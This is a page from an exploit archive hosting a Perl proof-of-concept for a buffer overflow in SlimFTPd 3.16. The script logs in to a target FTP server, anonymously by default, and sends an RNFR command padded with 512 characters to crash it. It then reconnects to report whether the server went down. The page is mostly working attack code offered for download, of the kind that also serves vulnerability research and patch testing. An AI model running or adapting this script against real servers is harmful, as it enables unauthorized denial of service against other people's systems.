exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

47slimftpd_bof.pl.txt

47slimftpd_bof.pl.txt
Posted Jul 23, 2005
Authored by Raphael Rigo

SlimFTPd 3.16 remote proof of concept exploit.

tags | exploit, remote, proof of concept
SHA-256 | fd39268110becc1ce7adb2f03d24132bc1fd6bb347f4378611a43390faa26c71

47slimftpd_bof.pl.txt

Change Mirror Download
---------------------------------------
Affected version: 3.16
Bug found by Raphaƫl Rigo
PoC exploit for demonstration
---------------------------------------

*#!/usr/bin/perl*

/# --------------------------------------------------- #/
/# 47slimftpd_bof.pl - PoC exploit for SlimFTPd Server #/
/# version 3.16 #/
/# bug found by ml-bugtraq@twilight-hall.net #/
/# #/
/# coded by k0r0l from acolytez team #/
/# visit http://acolytez.com for details #/
/# --------------------------------------------------- #/

*use* Net::FTP;

/# geting data/
$host = @ARGV[0];
$port = @ARGV[1];
$debug = @ARGV[2];
$user = @ARGV[3];
$pass = @ARGV[4];

/# ===========/

*if* (($host) && ($port)) {

/# make exploit string/
$exploit_string = *"*RNFR *"*;
$exploit_string .= *"*X*"*x512;
/# ===================/

print *"*Trying to connect to $host:$port\n*"*;
$sock = Net::FTP->new(*"*$host*"*,Port => $port, TimeOut => 30, Debug => $debug) *or* die *"*[-] Connection failed\n*"*;
print *"*[+] Connect OK!\n*"*;
print *"*Logging...\n*"*;
*if* (!$user) {
$user = *"*anonymous*"*;
$pass = *"*ftp@ftp.com*"*;
}
$sock->login($user, $pass);
$answer = $sock->message;
print *"*Sending string...\n*"*;
$sock->quot($exploit_string);
print *"*Server $host may be down. Checking...\n*"*;
$sock = Net::FTP->new(*"*$host*"*,Port => $port, TimeOut => 30, Debug => $debug) *or* die *"*[-] Connection failed\n*"*;
*if* ($sock) {print *"*[-] Exploit failed.\n*"*;} *else* {print *"*[+] Server crashed!\n*"*;}


} *else* {
print *"*SlimFTPd Server - PoC Exploit\nhttp://AcolyteZ.com\n\nUsing: $0 host port username password [debug: 1 or 0]\n\n*"*;
}


--
+################################+
# Dim K0r0l (dim@acolytez.com) #
# #
# http://AcolyteZ.com #
# Net-security, coding, soft etc #
+################################+

Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close